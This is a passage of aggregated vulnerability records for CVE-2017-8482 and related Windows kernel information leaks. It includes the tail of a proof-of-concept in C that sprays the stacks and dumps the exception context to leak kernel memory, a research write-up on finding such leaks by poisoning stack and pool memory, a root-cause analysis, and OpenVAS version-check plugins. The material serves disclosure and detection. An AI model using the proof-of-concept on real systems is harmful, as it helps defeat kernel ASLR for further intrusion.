sizeof(buffer));\r\n}\r\n\r\nVOID SprayUserStack() {\r\n // Buffer allocated from the user-mode stack.\r\n BYTE buffer[4096];\r\n MyMemset(buffer, 'x', sizeof(buffer));\r\n}\r\n\r\nLONG WINAPI MyUnhandledExceptionFilter(\r\n _In_ struct _EXCEPTION_POINTERS *ExceptionInfo\r\n ) {\r\n PrintHex((PBYTE)ExceptionInfo->ContextRecord, sizeof(CONTEXT));\r\n return 
EXCEPTION_CONTINUE_EXECUTION;\r\n}\r\n\r\nint main() {\r\n SetUnhandledExceptionFilter(MyUnhandledExceptionFilter);\r\n\r\n SprayKernelStack();\r\n SprayUserStack();\r\n\r\n RaiseException(1337, 0, 0, NULL);\r\n\r\n return 0;\r\n}\r\n", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/42220/"}], "myhack58": [{"lastseen": "2017-06-14T16:16:53", "bulletinFamily": "info", "cvelist": ["CVE-2017-8482"], "edition": 1, "description": "On the June 2017 patch day, 5 kernel information leak vulnerabilities that we had reported earlier were fixed; details are at the end of the article. \nThe year before, I demonstrated how to use JS to fuzz the kernel; today we want to bring you a way of finding kernel vulnerabilities automatically that does not depend on fuzzing. \nFrom the work of the last few months I have picked one small topic: finding vulnerabilities of the kernel information leak type. \nBackground \nSince Windows Vista, Microsoft has enabled ASLR in the kernel by default, referred to as KASLR. \nKASLR randomizes module load base addresses, kernel object addresses and so on, which mitigates the exploitation of vulnerabilities. \nFrom Windows 8 on, this security feature was further strengthened. \nnt!ExIsRestrictedCaller was introduced to prevent low-integrity programs from calling certain functions that can leak module base addresses, kernel object addresses and other key information. 
\nThese include, but are not limited to: \nNtQuerySystemInformation \n* SystemModuleInformation \n* SystemModuleInformationEx \n* SystemLocksInformation \n* SystemStackTraceInformation \n* SystemHandleInformation \n* SystemExtendedHandleInformation \n* SystemObjectInformation \n* SystemBigPoolInformation \n* SystemSessionBigPoolInformation \n* SystemProcessInformation \n* SystemFullProcessInformation \nNtQueryInformationThread \nNtQueryInformationProcess \nThe above are the traditional ways of obtaining kernel module addresses and kernel object addresses, provided as normal kernel functionality. \nBut for programs running below medium integrity, these calls fail from Windows 8 on. \nKASLR is one of the exploit mitigations, and one of its purposes is to make constructing a generic ROP chain more difficult. \nFor an exploit writer, finding an information leak vulnerability that directly leaks the desired module base address is the direct way to counter KASLR. \nCharacteristics \nFinding this kind of kernel vulnerability has its own peculiarity. For example, a traditional memory corruption vulnerability itself affects the normal operation of the system, so with Verifier and other tools the resulting exception can be captured fairly conveniently. \nAn information leak vulnerability, however, triggers no exception and does not interfere with the normal operation of the system, which makes such vulnerabilities harder to find. \nThe vulnerabilities objectively exist; what we need to do is discover them at the lowest possible cost. \nApproach \nWhen a leak occurs, the kernel necessarily writes key information into user-mode memory; if we monitor every write from kernel mode to a user-mode address, we can capture this behavior. 
\nOf course, the system does not provide this capability; the capture is done with a dedicated vulnerability-hunting framework by @pjf that is based on hardware virtualization. \n![](/Article/UploadPic/2017-6/2017614185824579.png?www.myhack58.com) \nSo as not to interfere with the operation of the target system itself, I run the monitoring in a virtual machine, write the necessary information to a log, and then do a secondary analysis on the host machine. \n![](/Article/UploadPic/2017-6/2017614185824194.png?www.myhack58.com) \nOn the physical machine, after decoding the log, loading symbols and doing some processing, \n![](/Article/UploadPic/2017-6/2017614185824867.png?www.myhack58.com) \nwe get a batch of logs like this. \n![](/Article/UploadPic/2017-6/2017614185825782.png?www.myhack58.com) \nSecondary analysis \nWe now have a record of every kernel write to user-mode memory over a period of actual operation. The vast majority of these are normal functionality; \nwe need to eliminate the interference and find out which data is critical information. \nTwo techniques are mainly used here. \nPoisoning the kernel stack \nPoisoning, or contaminating, the target data is a common idea; network attack and defense likewise has ARP and DNS cache poisoning. \nHere, kernel stack poisoning means contaminating the entire unused kernel stack space. If a kernel stack variable is not initialized, \nthen when that variable is written to user mode, the written data contains the magic value I marked it with; the log records in which the magic value appears are the points where a leak occurs. \nI also noticed that j00ru has used a similar technique in his BochsPwn project. \nKiFastCallEntry Hook \nTo get the opportunity to poison the kernel stack, I hook KiFastCallEntry and, each time a system call occurs, poison the remaining stack space below the current stack position. 
\n![](/Article/UploadPic/2017-6/2017614185825137.png?www.myhack58.com) \nIoGetStackLimits is first used to get the current thread's stack range, and then the entire space from the bottom of the stack to the current stack position is filled with 0xAA. \nThus, after a system call is entered, the contents of all local variables on the kernel stack are poisoned with 0xAA. \nPoisoning the kernel pool \nSimilarly, for dynamically allocated memory, I hook ExAllocatePoolWithTag and related functions and poison the contents of the pool allocations. \nThus, whether it is on the stack or on the heap, any memory that is not initialized contains our poison value. \nIf a kernel stack variable is not correctly initialized, this magic value may be written to user-mode memory. Combined with the log we captured, the information leak can be discovered immediately. \nTo rule out coincidences, the magic value is changed several times, for example 0xAAAAAAAA and 0xBBBBBBBB, to exclude false positives. \nAfter the interference is excluded, a typical result is as follows \n![](/Article/UploadPic/2017-6/2017614185825989.png?www.myhack58.com) \nYou can see that in a brief monitoring session, 161 leaks in the system were caught. \nOf course, these are not deduplicated: there are not that many independent vulnerabilities, rather some of the vulnerabilities leak repeatedly. \nAt this point we have a real information leak vulnerability together with its stack information; supplemented by simple manual analysis, the details can be worked out. \nThis is also the story behind CVE-2017-8482. \nDifferential comparison \nKernel information leaks caused by uninitialized stack memory can be found by poisoning and then looking for the marker. \nDirect leaks of critical information, such as directly writing the address of a module, object or pool, cannot be found with this method. 
\n", "modified": "2017-06-14T00:00:00", "published": "2017-06-14T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/87028.htm", "id": "MYHACK58:62201787028", "title": "Automated mining Windows kernel information disclosure vulnerability-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2017-11-19T11:56:15", "description": "One kernel memory disclosure in the exception handling code has already been discovered and reported as issue [#1177](https://bugs.chromium.org/p/project-zero/issues/detail?id=1177) . It was fixed in the June Patch Tuesday as CVE-2017-8482. However, it seems there is another bug in this code area, this time a pool (as opposed to stack) memory leak. We've had some trouble reproducing this behavior outside of our Bochs setup, but we have performed some analysis to better understand the root cause of the bug. The analysis, specific to Windows 7 32-bit, is presented below.\r\n\r\nThe leak occurs in the nt!RtlpCopyLegacyContextX86 routine, under the following stack trace:\r\n\r\n```\r\n--- cut ---\r\n #1 nt!RtlpCopyLegacyContextX86\r\n #2 nt!RtlpCopyLegacyContext\r\n #3 nt!RtlpCopyExtendedContext\r\n[...]\r\n--- cut ---\r\n```\r\n\r\nIt does not matter if the nt!RtlpCopyExtendedContext function is reached through a user-mode exception, a soft exception triggered manually with RaiseException(), or a GetThreadContext() call -- we have seen the disclosure take place in all three cases. 
An example of a full callstack is as follows:\r\n```\r\n--- cut ---\r\n #1 nt!RtlpCopyLegacyContextX86\r\n #2 nt!RtlpCopyLegacyContext\r\n #3 nt!RtlpCopyExtendedContext\r\n #4 nt!KiDispatchException\r\n #5 nt!KiRaiseException\r\n #6 nt!NtRaiseException\r\n #7 nt!KiSystemServicePostCall\r\n--- cut ---\r\n```\r\n\r\nMore precisely, the leak happens inside of an inlined memcpy() call, while copying 512 bytes corresponding to the CONTEXT.ExtendedRegisters field to userland. The construct can be represented as the following C code:\r\n```\r\n--- cut ---\r\n if ( (ContextFlags & CONTEXT_EXTENDED_REGISTERS) == CONTEXT_EXTENDED_REGISTERS )\r\n memcpy(DestContext->ExtendedRegisters, SourceContext->ExtendedRegisters, sizeof(DestContext->ExtendedRegisters));\r\n--- cut ---\r\n```\r\nWithin that memory region, 192 (0xC0) bytes at offset 0x120 (or offset 0x1EC in relation to the start of the CONTEXT structure) are uninitialized pool memory bytes, originating from an allocation made in nt!KeAllocateXStateContext:\r\n```\r\n--- cut ---\r\n.text:0048B8DE push 76615358h ; Tag\r\n.text:0048B8E3 add eax, 40h\r\n.text:0048B8E6 push eax ; NumberOfBytes\r\n.text:0048B8E7 push 0 ; PoolType\r\n.text:0048B8E9 call _ExAllocatePoolWithTag@12 ; ExAllocatePoolWithTag(x,x,x)\r\n--- cut ---\r\n```\r\n\r\nThe memory appears to be allocated for an XSAVE_AREA structure, which has the following definition:\r\n```\r\n--- cut ---\r\nkd> dt _XSAVE_AREA /r\r\nntdll!_XSAVE_AREA\r\n +0x000 LegacyState : _XSAVE_FORMAT\r\n +0x000 ControlWord : Uint2B\r\n +0x002 StatusWord : Uint2B\r\n +0x004 TagWord : UChar\r\n +0x005 Reserved1 : UChar\r\n +0x006 ErrorOpcode : Uint2B\r\n +0x008 ErrorOffset : Uint4B\r\n +0x00c ErrorSelector : Uint2B\r\n +0x00e Reserved2 : Uint2B\r\n +0x010 DataOffset : Uint4B\r\n +0x014 DataSelector : Uint2B\r\n +0x016 Reserved3 : Uint2B\r\n +0x018 MxCsr : Uint4B\r\n +0x01c MxCsr_Mask : Uint4B\r\n +0x020 FloatRegisters : [8] _M128A\r\n +0x000 Low : Uint8B\r\n +0x008 High : Int8B\r\n +0x0a0 
XmmRegisters : [8] _M128A\r\n +0x000 Low : Uint8B\r\n +0x008 High : Int8B\r\n +0x120 Reserved4 : [192] UChar\r\n +0x1e0 StackControl : [7] Uint4B\r\n +0x1fc Cr0NpxState : Uint4B\r\n +0x200 Header : _XSAVE_AREA_HEADER\r\n +0x000 Mask : Uint8B\r\n +0x008 Reserved : [7] Uint8B\r\n--- cut ---\r\n```\r\n\r\nAs is clearly visible, offset 0x120 of the structure is aligned with the \"Reserved4\" field consisting of 192 bytes, which is exactly how many uninitialized bytes we're observing in the leak. This suggests that the NPX context saved in XSAVE_AREA contains leftover pool bytes, which may be then copied to user-mode when a thread context with the CONTEXT_EXTENDED_REGISTERS flag is requested by a malicious, local process.\r\n\r\nRepeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.", "published": "2017-10-17T00:00:00", "type": "seebug", "title": "Microsoft Windows Kernel Local Information Disclosure Vulnerability(CVE-2017-11784)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11784", "CVE-2017-8482"], "modified": "2017-10-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96721", "id": "SSV:96721", "sourceData": "", "sourceHref": "", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2020-06-08T23:27:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8480", "CVE-2017-8489", "CVE-2017-8479", "CVE-2017-0300", "CVE-2017-0299", "CVE-2017-8476"], "description": "This host is missing an important security\n update according to Microsoft KB4022013", "modified": "2020-06-04T00:00:00", "published": "2017-06-14T00:00:00", "id": "OPENVAS:1361412562310811163", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811163", 
"type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022013)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022013)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811163\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8476\", \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8480\",\n \"CVE-2017-8481\", \"CVE-2017-8482\", \"CVE-2017-8485\", \"CVE-2017-8489\",\n \"CVE-2017-0299\", \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0300\",\n \"CVE-2017-8462\", \"CVE-2017-8469\");\n script_bugtraq_id(98903, 98845, 98856, 98857, 98862, 98858, 98860, 98865, 98884,\n 98869, 98870, 98901, 98900, 98842);\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 09:35:26 +0530 
(Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022013)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4022013\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - The Windows kernel improperly initializes objects in memory.\n\n - The Windows kernel fails to properly initialize a memory address, allowing\n an attacker to retrieve information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022013\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Advapi32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.0.6002.19598\"))\n{\n Vulnerable_range = \"Less than 6.0.6002.19598\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:fileVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24107\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24107\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\Advapi32.dll\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-08T23:23:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", 
"CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296"], "description": "This host is missing a critical security\n update according to Microsoft KB4022718", "modified": "2020-06-04T00:00:00", "published": "2017-06-14T00:00:00", "id": "OPENVAS:1361412562310811178", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811178", "type": "openvas", "title": "Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022718)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022718)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811178\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8472\", \"CVE-2017-8473\", \"CVE-2017-8474\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0282\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8531\", \"CVE-2017-0283\", \"CVE-2017-0284\",\n \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\",\n \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-8480\", \"CVE-2017-8481\",\n \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\", \"CVE-2017-8482\",\n \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-0289\", \"CVE-2017-0291\",\n \"CVE-2017-0292\", \"CVE-2017-8484\", \"CVE-2017-8485\", \"CVE-2017-8553\",\n \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8488\", \"CVE-2017-8489\",\n \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-8490\", \"CVE-2017-8491\",\n \"CVE-2017-8492\", \"CVE-2017-0299\", \"CVE-2017-0300\", \"CVE-2017-8460\",\n \"CVE-2017-8462\", \"CVE-2017-8464\", \"CVE-2017-8470\", \"CVE-2017-8471\",\n \"CVE-2017-8469\", \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98851, 98852, 98902, 98933, 98949, 98885, 98853, 98903,\n 98819, 98920, 98918, 98854, 98845, 98856, 98820, 98821, 98914,\n 98857, 98862, 98824, 98922, 98923, 98858, 98859, 98826, 98929,\n 98835, 98836, 98847, 98860, 98940, 98837, 98839, 98864, 98865,\n 98840, 98867, 98869, 98870, 98884, 98901, 98887, 98900, 98818,\n 98848, 98849, 98842);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", 
value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 17:00:32 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022718)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022718\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Users cannot print enhanced metafiles (EMF) or documents containing bitmaps\n rendered out of bounds using the BitMapSection(DIBSection) function.\n\n - Security updates to Microsoft Windows PDF, Windows shell, Windows Kernel,\n Microsoft Graphics Component, Microsoft Uniscribe and Windows Kernel-Mode\n Drivers.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to gain the same user rights as the current user. If the current user is\n logged on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. An attacker could then install\n programs, view, change, or delete data or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022718\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.2.9200.22168\"))\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.22168\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:20:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-0294", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-0284", "CVE-2017-8544", 
"CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8534", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "description": "This host is missing a critical security\n update according to Microsoft KB4022722", "modified": "2020-06-04T00:00:00", "published": "2017-06-14T00:00:00", "id": "OPENVAS:1361412562310811168", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811168", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022722)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022722)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811168\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8472\", \"CVE-2017-8473\", \"CVE-2017-8475\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0260\", \"CVE-2017-0282\",\n \"CVE-2017-8476\", \"CVE-2017-8477\", \"CVE-2017-8531\", \"CVE-2017-0283\",\n \"CVE-2017-0284\", \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\",\n \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-0286\", \"CVE-2017-0287\",\n \"CVE-2017-8480\", \"CVE-2017-8481\", \"CVE-2017-8534\", \"CVE-2017-8543\",\n \"CVE-2017-8544\", \"CVE-2017-0288\", \"CVE-2017-0289\", \"CVE-2017-8482\",\n \"CVE-2017-8483\", \"CVE-2017-8484\", \"CVE-2017-8485\", \"CVE-2017-8553\",\n \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8488\", \"CVE-2017-8489\",\n \"CVE-2017-8490\", \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-0299\",\n \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0300\", \"CVE-2017-8462\",\n \"CVE-2017-8464\", \"CVE-2017-8469\", \"CVE-2017-8470\", \"CVE-2017-8471\",\n \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98851, 98852, 98853, 98933, 98949, 98810, 98885, 98903,\n 98854, 98819, 98920, 98918, 98845, 98856, 98820, 98821, 98914,\n 98891, 98922, 98857, 98862, 98822, 98824, 98826, 98923, 98929,\n 98858, 98859, 98847, 98860, 98940, 98837, 98839, 98864, 98865,\n 98867, 98840, 98884, 98869, 98870, 98901, 98900, 98818, 98842,\n 98848, 98849);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 
+0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 13:50:07 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022722)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022722\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This security update includes quality\n improvements.\n\n - Addressed issue where, after installing KB3164035, users cannot print\n enhanced metafiles (EMF) or documents containing bitmaps rendered out of bounds\n using the BitMapSection(DIBSection) function.\n\n - Addressed issue where updates were not correctly installing all components and\n would prevent them from booting.\n\n - Addressed issue where an unsupported hardware notification is shown and Windows\n Updates not scanning, for systems using the AMD Carrizo DDR4 processor. For the\n affected systems, follow the steps in the Additional Information section to\n install this update.\n\n - Security updates to Windows kernel, Microsoft Graphics Component, Microsoft\n Uniscribe, Windows kernel-mode drivers, the Windows OS, Windows COM and\n Windows shell.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to gain the same user rights as the current user. If the current user is\n logged on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. An attacker could then install\n programs. View, change, or delete data, or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\n\n - Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022722\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008r2:2, win7:2, win7x64:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Gdi32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.23807\"))\n{\n report = 'File checked: ' + sysPath + \"\\Gdi32.dll\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.1.7601.23807\\n' ;\n security_message(data:report);\n 